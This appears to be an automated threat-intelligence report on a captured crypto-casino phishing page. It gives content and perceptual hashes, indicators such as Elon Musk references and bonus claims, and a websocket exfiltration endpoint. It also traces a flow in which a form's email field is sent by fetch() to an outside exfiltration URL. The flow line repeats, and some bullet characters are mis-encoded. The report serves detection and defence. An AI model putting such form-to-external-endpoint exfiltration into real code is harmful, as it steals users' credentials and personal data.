Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1007418BFA72802B9E105C7DCC952A035316E24FE3B6186E4F7198F36B118CDD9869D93 |
|
CONTENT
ssdeep
|
1536:PaF+6yc9BoUpQ5rTADK7awVJA4E11gXqFM3UBWXc9BoUpQ5AWtGPOWIbZDoeY579:PXc9HQqeVJA4E118c9HQwPyGV8cE6 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
939939e6a66c6c85 |
|
VISUAL
aHash
|
162c3c043e3c2c3c |
|
VISUAL
dHash
|
e4d9d0c4e4c4d8dc |
|
VISUAL
wHash
|
163c7c347e3c2c3c |
|
VISUAL
colorHash
|
30003600000 |
|
VISUAL
cropResistant
|
e4d9d0c4e4c4d8dc |
โข Threat: Cryptocurrency Casino Phishing
โข Target: Users interested in crypto casinos
โข Method: Deceptive website offering bonuses and promoting a fake affiliation.
โข Exfil: wss://gambler-work.com/api/ws
โข Indicators: Recent domain, JavaScript obfuscation, references to Elon Musk, claims of exclusive bonuses.
โข Risk: High
The website impersonates a crypto casino to steal user credentials or financial information.
Using Elon Musk and exclusive bonus claims to attract the user.
User fills <input name='email'> โ submitForm() โ fetch('https://failax.com/api/exfiltrate') โ user data sent to external endpoint
User fills <input name='email'> โ submitForm() โ fetch('https://failax.com/api/exfiltrate') โ user data sent to external endpoint
main-app-fef4a8898ec7782a.jssubmitForm()sendData()pixel_id
Pages with identical visual appearance (based on perceptual hash)